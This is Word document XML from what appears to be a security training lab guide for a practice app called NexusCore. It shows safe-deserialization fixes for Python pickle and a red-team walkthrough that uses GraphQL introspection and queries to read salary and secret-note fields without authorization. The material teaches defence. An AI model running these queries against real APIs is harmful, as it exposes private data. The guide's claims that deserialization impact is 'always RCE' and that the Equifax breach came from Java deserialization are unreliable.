              <w:right w:val="single" w:color="1A7A4A"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If you need tamper-proof data, use HMAC-signed JSON (like itsdangerous.URLSafeSerializer).</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3F55" w:sz="1"/>
              <w:left w:val="single" w:color="5DADE2" w:sz="14"/>
              <w:bottom w:val="single" w:color="2A3F55" w:sz="1"/>
              <w:right w:val="single" w:color="2A3F55" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="161F2A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="300"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="85C1E9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"># FIXED — use HMAC-signed JSON instead of pickle:
from itsdangerous import URLSafeSerializer
SERIALIZER = URLSafeSerializer(app.secret_key, salt="session-export")
# Export:
@app.route("/api/session/export")
def sess_export_fixed():
    u = jwt_user()
    data = {"username": u["username"], "role": u["role"], "ts": int(time.time())}
    token = SERIALIZER.dumps(data)  # JSON + HMAC signature
    return jsonify({"session_data": token, "format": "signed-json"})
# Import:
@app.route("/api/session/import", methods=["POST"])
def sess_import_fixed():
    u = jwt_user()
    token = request.get_json().get("session_data", "")
    try:
        data = SERIALIZER.loads(token)  # verifies signature — tamper-proof
        return jsonify({"success": True, "session": data})
    except Exception:
        return jsonify({"error": "Invalid or tampered session data"}), 400</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1A7A4A" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="1A7A4A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="90"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="90"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">STEP
2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="E9F7EF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1A7A4A"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">If pickle must be used — implement strict allow-list of classes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A"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Override Unpickler.find_class() to block all classes except explicitly allowed ones.</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3F55" w:sz="1"/>
              <w:left w:val="single" w:color="5DADE2" w:sz="14"/>
              <w:bottom w:val="single" w:color="2A3F55" w:sz="1"/>
              <w:right w:val="single" w:color="2A3F55" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="161F2A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="300"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="85C1E9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"># Safe unpickler if you absolutely must use pickle:
class SafeUnpickler(pickle.Unpickler):
    ALLOWED = {("builtins", "dict"), ("builtins", "list"), ("builtins", "str")}
    def find_class(self, module, name):
        if (module, name) not in self.ALLOWED:
            raise pickle.UnpicklingError(f"Class {module}.{name} is not allowed")
        return super().find_class(module, name)
# Use instead of pickle.loads:
obj = SafeUnpickler(io.BytesIO(raw_bytes)).load()</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A6F1E" w:sz="1"/>
              <w:left w:val="single" w:color="CA6F1E" w:sz="14"/>
              <w:bottom w:val="single" w:color="CA6F1E" w:sz="1"/>
              <w:right w:val="single" w:color="CA6F1E" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FEF9E7" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="60" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="CA6F1E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">⚠️  Real-World Impact</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1C2833"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Insecure deserialization was OWASP #8 in 2017, part of A08:2021. Real-world examples: 2017 Equifax breach used Java deserialization. Node.js serialize-javascript, Ruby Marshal, PHP unserialize — all the same class of vulnerability. Impact: always RCE — the worst possible vulnerability class.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="C8D6E5" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="0" w:after="40" w:line="276"/>
        <w:jc w:val="left"/>
      </w:pP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0"/>
        <w:gridCol w:w="8620"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="740"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="C0392B" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">V7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8620"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C0392B" w:sz="1"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>
              <w:right w:val="single" w:color="C0392B" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FDEDEC" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">GraphQL — Introspection + Field Injection</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1C2833"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">   </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">[ Advanced ]</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276" w:sz="1"/>
              <w:left w:val="single" w:color="1A5276" w:sz="14"/>
              <w:bottom w:val="single" w:color="1A5276" w:sz="1"/>
              <w:right w:val="single" w:color="1A5276" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="EBF5FB" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="60" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1A5276"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">📖  What Is This Vulnerability?</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1C2833"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">GraphQL introspection reveals the complete API schema to any authenticated user. The NexusCore analytics API then fails to enforce field-level authorization — any user can query salary and secret_note fields even though they are marked "admin only" in the schema description.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100" w:after="100" w:line="276"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">🔴  RED TEAM — ATTACK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C0392B" w:sz="1"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>
              <w:right w:val="single" w:color="C0392B" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="C0392B" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="90"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="90"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">STEP
1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C0392B" w:sz="1"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>
              <w:right w:val="single" w:color="C0392B" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FDEDEC" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Navigate to GraphQL API and run introspection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5"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Navigate to GraphQL API → click "Introspect Schema" preset.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5"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Query: { __schema { types { name fields { name description } } } }</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5"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Response reveals ALL types and fields: User (with salary, secret_note), Project, Query.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C0392B"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Description says "RESTRICTED — admin only" but there is no actual enforcement!</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C0392B" w:sz="1"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>
              <w:right w:val="single" w:color="C0392B" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="C0392B" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="90"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="90"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">STEP
2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C0392B" w:sz="1"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>
              <w:right w:val="single" w:color="C0392B" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FDEDEC" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Query basic user fields to confirm access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5"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Click "Users (basic)" preset: { users { id username role } }</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5"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Returns all 4 users — works fine.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C0392B"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Now try adding restricted fields...</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3F55" w:sz="1"/>
              <w:left w:val="single" w:color="5DADE2" w:sz="14"/>
              <w:bottom w:val="single" w:color="2A3F55" w:sz="1"/>
              <w:right w:val="single" w:color="2A3F55" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="161F2A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="300"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="85C1E9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">// Basic query — works as expected:
{ users { id username role } }
// Now escalate to restricted fields:
{ users { id username role salary secret_note } }</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C0392B" w:sz="1"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>
              <w:right w:val="single" w:color="C0392B" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="C0392B" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="90"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="90"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">STEP
3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C0392B" w:sz="1"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>
              <w:right w:val="single" w:color="C0392B" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FDEDEC" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Extract salary and secret_note without admin role</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5"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Click "Users + Salary + Flag" preset:</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5"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 users { id username role salary secret_note } }</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
